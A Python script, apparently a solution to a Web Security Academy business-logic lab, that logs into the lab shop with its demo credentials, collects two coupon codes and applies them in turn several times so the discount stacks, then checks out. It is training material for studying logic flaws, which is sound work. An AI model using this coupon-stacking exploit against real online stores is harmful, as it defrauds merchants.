1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
| from bs4 import BeautifulSoup
from urllib.parse import urljoin
import re
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Define Variables
base_url = 'https://0a3900c2044cf17781f1123e00480036.web-security-academy.net/'
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# Get CSRF Token
def get_csrf_token(session, url):
response = session.get(url, proxies=proxies, verify=False)
csrf_token = BeautifulSoup(response.text, 'html.parser').find('input', {'name': 'csrf'}).get('value')
return csrf_token
def get_coupon_codes(session, url):
response = session.get(url, proxies=proxies, verify=False)
soup = BeautifulSoup(response.content, "html.parser")
csrf_token = get_csrf_token(session, url)
# Sign up for the newsletter
form_data = {
"csrf": csrf_token,
"email": "attacker@evil.sec" # Replace with your email address
}
signup_response = session.post(url + "sign-up", data=form_data)
# Extract coupon codes from the response
newcust_coupon = re.search(r'New customers use code at checkout: (\w+)', str(soup)).group(1)
signup_coupon = re.search(r'(?<=coupon )([A-Z]+[0-9]+)', signup_response.text).group()
# Return coupon codes as a list
coupon_codes = [newcust_coupon, signup_coupon]
return coupon_codes
# Purchase Item
def purchase_item(session, url):
# Login
login_url = urljoin(base_url, 'login')
login_csrf_token = get_csrf_token(session, login_url)
login_payload = {'username': 'wiener', 'password': 'peter', 'csrf': login_csrf_token}
login_response = session.post(login_url, data=login_payload, proxies=proxies, verify=False)
if login_response.status_code == 200:
# Add item
cart_url = urljoin(base_url, 'cart')
cart_payload1 = {'productId': '1', 'redir': 'PRODUCT', 'quantity': '1'}
session.post(cart_url, data=cart_payload1, proxies=proxies, verify=False)
# Add coupon
coupon_url = urljoin(base_url, 'cart/coupon')
coupon_codes = get_coupon_codes(session, url)
for coupon in coupon_codes * 4:
coupon_payload = {'csrf': get_csrf_token(session, cart_url), 'coupon': coupon}
session.post(coupon_url, data=coupon_payload, proxies=proxies, verify=False)
print(f"Added coupon {coupon}")
# Checkout
checkout_url = urljoin(base_url, 'cart/checkout')
checkout_csrf_token = get_csrf_token(session, cart_url)
checkout_payload = {'csrf': checkout_csrf_token}
checkout_response = session.post(checkout_url, data=checkout_payload, proxies=proxies, verify=False)
if checkout_response.status_code == 200:
print("Purchase successful!")
else:
print("Failed to checkout.")
else:
print("Failed to log in.")
def main():
session = requests.Session()
purchase_item(session, base_url)
if __name__ == "__main__":
main()
|